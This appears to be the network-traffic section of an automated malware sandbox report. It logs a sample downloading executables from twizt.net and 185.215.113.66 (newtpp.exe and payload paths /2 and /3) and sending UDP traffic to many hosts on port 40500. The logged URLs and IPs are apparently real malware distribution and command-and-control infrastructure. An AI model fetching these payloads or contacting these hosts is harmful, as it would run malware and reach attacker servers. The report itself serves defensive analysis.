Network Analysis
IP Address | Status | Action |
---|---|---|
151.233.182.0 | Active | Moloch |
151.243.192.202 | Active | Moloch |
164.124.101.2 | Active | Moloch |
178.90.117.247 | Active | Moloch |
185.215.113.66 | Active | Moloch |
188.212.185.135 | Active | Moloch |
188.240.99.47 | Active | Moloch |
2.183.107.200 | Active | Moloch |
20.72.235.82 | Active | Moloch |
31.25.131.226 | Active | Moloch |
43.246.243.120 | Active | Moloch |
46.167.131.62 | Active | Moloch |
5.104.215.231 | Active | Moloch |
5.200.174.76 | Active | Moloch |
78.39.225.27 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
twizt.net | 185.215.113.66 | |
www.update.microsoft.com | 20.72.235.82 |
- TCP Requests
-
-
192.168.56.101:49161 185.215.113.66:80twizt.net
-
192.168.56.101:49164 185.215.113.66:80twizt.net
-
192.168.56.101:49167 185.215.113.66:80twizt.net
-
192.168.56.101:49168 185.215.113.66:80twizt.net
-
192.168.56.101:49173 185.215.113.66:80twizt.net
-
192.168.56.101:49174 185.215.113.66:80twizt.net
-
192.168.56.101:49175 185.215.113.66:80twizt.net
-
- UDP Requests
-
-
192.168.56.101:54150 151.233.182.0:40500
-
192.168.56.101:54150 151.243.192.202:40500
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:54150 188.212.185.135:40500
-
192.168.56.101:54150 188.240.99.47:40500
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:54150 2.183.107.200:40500
-
192.168.56.101:54149 239.255.255.250:1900
-
192.168.56.101:59005 239.255.255.250:1900
-
192.168.56.101:54150 43.246.243.120:40500
-
192.168.56.101:54150 46.167.131.62:40500
-
192.168.56.101:54150 5.104.215.231:40500
-
192.168.56.101:54150 5.200.174.76:40500
-
192.168.56.101:54150 78.39.225.27:40500
-
GET
200
http://twizt.net/newtpp.exe
REQUEST
RESPONSE
BODY
GET /newtpp.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Host: twizt.net
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 16 Jul 2024 01:57:41 GMT
Content-Type: application/octet-stream
Content-Length: 90112
Last-Modified: Sat, 13 Jul 2024 11:50:08 GMT
Connection: keep-alive
ETag: "669269f0-16000"
Accept-Ranges: bytes
GET
200
http://twizt.net/peinstall.php
REQUEST
RESPONSE
BODY
GET /peinstall.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Host: twizt.net
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 16 Jul 2024 01:57:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
404
http://185.215.113.66/1
REQUEST
RESPONSE
BODY
GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 16 Jul 2024 01:57:51 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
GET
200
http://185.215.113.66/2
REQUEST
RESPONSE
BODY
GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 16 Jul 2024 01:57:54 GMT
Content-Type: application/octet-stream
Content-Length: 81928
Last-Modified: Sat, 13 Jul 2024 14:21:52 GMT
Connection: keep-alive
ETag: "66928d80-14008"
Accept-Ranges: bytes
GET
200
http://185.215.113.66/2
REQUEST
RESPONSE
BODY
GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 16 Jul 2024 01:57:55 GMT
Content-Type: application/octet-stream
Content-Length: 81928
Last-Modified: Sat, 13 Jul 2024 14:21:52 GMT
Connection: keep-alive
ETag: "66928d80-14008"
Accept-Ranges: bytes
GET
200
http://185.215.113.66/2
REQUEST
RESPONSE
BODY
GET /2 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: 185.215.113.66
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 16 Jul 2024 01:59:24 GMT
Content-Type: application/octet-stream
Content-Length: 81928
Last-Modified: Sat, 13 Jul 2024 14:21:52 GMT
Connection: keep-alive
ETag: "66928d80-14008"
Accept-Ranges: bytes
GET
200
http://185.215.113.66/3
REQUEST
RESPONSE
BODY
GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 16 Jul 2024 01:59:26 GMT
Content-Type: application/octet-stream
Content-Length: 88320
Last-Modified: Sat, 13 Jul 2024 14:21:39 GMT
Connection: keep-alive
ETag: "66928d73-15900"
Accept-Ranges: bytes
GET
200
http://185.215.113.66/3
REQUEST
RESPONSE
BODY
GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 16 Jul 2024 01:59:28 GMT
Content-Type: application/octet-stream
Content-Length: 88320
Last-Modified: Sat, 13 Jul 2024 14:21:39 GMT
Connection: keep-alive
ETag: "66928d73-15900"
Accept-Ranges: bytes
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
188.240.99.47 | 192.168.56.101 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts